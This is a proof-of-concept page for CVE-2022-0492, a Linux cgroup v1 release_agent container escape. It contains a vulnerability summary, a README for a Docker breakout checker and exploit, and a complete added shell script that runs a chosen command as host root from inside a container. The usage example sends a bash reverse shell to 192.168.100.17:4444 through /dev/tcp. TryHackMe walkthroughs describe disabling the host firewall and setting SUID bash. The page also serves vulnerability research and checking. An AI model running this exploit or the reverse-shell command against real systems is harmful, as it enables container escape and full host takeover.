
CVE-2022-0492 PoC — Linux kernel authorization vulnerability

Source
Associated Vulnerability
Title: Linux kernel authorization vulnerability (CVE-2022-0492)
Description: The Linux kernel is the kernel used by Linux, the open-source operating system maintained by the Linux Foundation (USA). The Linux kernel contains an authorization vulnerability caused by improper restriction of user permissions. An attacker can exploit it through the cgroups release_agent to bypass kernel restrictions and escalate privileges.
Description
Docker Breakout Checker and PoC via CAP_SYS_ADMIN and via user namespaces (CVE-2022-0492)
Readme
# CVE-2022-0492 Docker Breakout Checker and PoC

## Summary

Exploiting the vulnerability requires the attacker to already have code execution inside a Docker container on a vulnerable host. Once exploited, the attacker can escape the container and gain full root control of the host.

The flaw is in `cgroup_release_agent_write` in `kernel/cgroup/cgroup-v1.c`. Under certain circumstances it allows the cgroups v1 `release_agent` feature to be used to escalate privileges and bypass namespace isolation.

More simply put, cgroups v1 has a feature called `release_agent`: when a cgroup with `notify_on_release` enabled becomes empty (its last process exits), the kernel executes the program named in the hierarchy's `release_agent` file. That program runs as root in the host's namespaces, and its path is interpreted from the host's point of view. Whoever can write `release_agent` therefore gets code execution as host root. The file is owned by root, and before the fix the write path performed no capability check at all; DAC permission on the file was the only gate. It can thus be written by a root process in the container that holds `CAP_SYS_ADMIN` (needed to mount a cgroup hierarchy, e.g. `--privileged` or `--cap-add SYS_ADMIN`), or, on unpatched kernels, by an unprivileged process that first creates a user namespace plus cgroup namespace (`unshare -UrmC`), which makes it root of a cgroup hierarchy it may mount itself. That second path is CVE-2022-0492. The fix requires `CAP_SYS_ADMIN` in the initial user namespace both for writing `release_agent` and for setting it as a cgroup v1 mount option, so on a patched kernel the user-namespace variant fails with `EPERM`, which is what a checker can test for. Note that Docker's default seccomp profile blocks `unshare` and its default AppArmor profile blocks the cgroup mount, so containers running with the default profiles are not reachable by this script; containers started with `--privileged`, `--cap-add SYS_ADMIN`, `--security-opt seccomp=unconfined` or `--security-opt apparmor=unconfined` are the realistic targets.
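The release_agent technique described above, as an added example written for this page; it is not the repository's `CVE-2022-0492.sh` and does not reproduce its checker. It assumes (not stated on the page) that the container's root filesystem is an overlay2 mount visible in `/etc/mtab`, that the `rdma` cgroup v1 controller exists and is not yet mounted inside the container, and that the caller already has `CAP_SYS_ADMIN` (container root, or an unprivileged user on an unpatched kernel after `unshare -UrmC`). The helper names `host_upperdir`, `container_root_on_host`, `payload_script` and `release_agent_escape`, the mount point `/tmp/cgrp_$$` and the file names `/escape.sh` and `escape.out` are all choices made here.

```sh
#!/bin/sh
# Added example of the cgroup v1 release_agent container escape; not the
# project's own script. Assumes an overlay2 root, an unmounted "rdma" v1
# controller and CAP_SYS_ADMIN (real root, or a user namespace on an
# unpatched kernel). Helper and file names are chosen here, not from the page.

# Extract the host-side path of the container's writable layer from one
# overlay mount line. release_agent is executed by the host, so the payload
# must be named by the path the host sees, not the path the container sees.
host_upperdir() {
    printf '%s\n' "$1" | sed -n 's/.*upperdir=\([^,]*\).*/\1/p'
}

# Same, for the mount line of "/" taken from /etc/mtab (empty if not overlay).
container_root_on_host() {
    host_upperdir "$(awk '$2 == "/" && $3 == "overlay"' /etc/mtab 2>/dev/null)"
}

# Build the script the host will run as root. Its output is written into the
# container's upperdir so the attacker can read it back from inside.
payload_script() {
    cmd="$1"; out="$2"
    printf '#!/bin/sh\n%s > %s 2>&1\n' "$cmd" "$out"
}

# 1. mount a fresh cgroup v1 hierarchy, 2. create a child cgroup with
# notify_on_release, 3. point release_agent at our payload by host path,
# 4. put a short-lived shell into the child so it empties and the kernel
# runs release_agent as host root.
release_agent_escape() {
    cmd="$1"
    mnt="/tmp/cgrp_$$"
    hostroot=$(container_root_on_host)
    [ -n "$hostroot" ] || { echo "cannot resolve overlay upperdir from /etc/mtab" >&2; return 1; }

    mkdir -p "$mnt" &&
    mount -t cgroup -o rdma cgroup "$mnt" &&            # any v1 controller not already mounted works
    mkdir -p "$mnt/x" &&
    echo 1 > "$mnt/x/notify_on_release" &&               # request the callback when x becomes empty
    payload_script "$cmd" "$hostroot/escape.out" > /escape.sh &&
    chmod +x /escape.sh &&
    echo "$hostroot/escape.sh" > "$mnt/release_agent" && # the write the CVE fix now gates on CAP_SYS_ADMIN
    sh -c "echo \$\$ > $mnt/x/cgroup.procs" &&           # shell joins x, then exits -> x is empty
    sleep 1 &&
    cat /escape.out                                      # output written by the host-side run
}

# Run only when invoked with a command, e.g.: sh cgroup_escape.sh 'id; hostname'
if [ "$#" -gt 0 ]; then
    release_agent_escape "$*"
fi
```

On a patched kernel the `echo ... > release_agent` step fails with `EPERM` when run from a user namespace, which is the observable difference between "vulnerable" and "fixed" that a checker can rely on; with real root and `CAP_SYS_ADMIN` in the initial user namespace the write still succeeds on every kernel, because that is the intended privileged behaviour, not the bug.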

## Usage

```
# sh CVE-2022-0492.sh

[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
        sh CVE-2022-0492.sh    --checker                Verify if system is vulnerable.
        sh CVE-2022-0492.sh -c|--command <COMMAND>      Execute command on host machine.
        sh CVE-2022-0492.sh -h|--help                   Print the help panel.

[>] Example:
        sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'

```

## Examples

### [Hamlet](https://tryhackme.com/room/hamlet) from TryHackMe
Root on the host machine obtained by disabling UFW from the escaped context and then sending a reverse shell.

![](/assets/Hamlet.gif)


### [Misguided Ghosts](https://tryhackme.com/room/misguidedghosts) from TryHackMe
Root on the host machine obtained by setting the SUID bit on bash, followed by a reverse shell.

![](/assets/Misguided_Ghosts.gif)

#### Sources:
- https://github.com/puckiestyle/CVE-2022-0492
- http://mon0dy.top/2022/04/16/%E8%BF%91%E6%9C%9FLinux%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%20exp%E6%B1%87%E6%80%BB/#cve-2022-0492
File Snapshot

```
[4.0K] /data/pocs/22fd863c78653c13da229a734b0087f81d635cce
├── [4.0K] assets
│   ├── [1.5M] Hamlet.gif
│   └── [1.9M] Misguided_Ghosts.gif
├── [4.7K] CVE-2022-0492.sh
├── [ 34K] LICENSE
└── [2.1K] README.md

1 directory, 5 files
```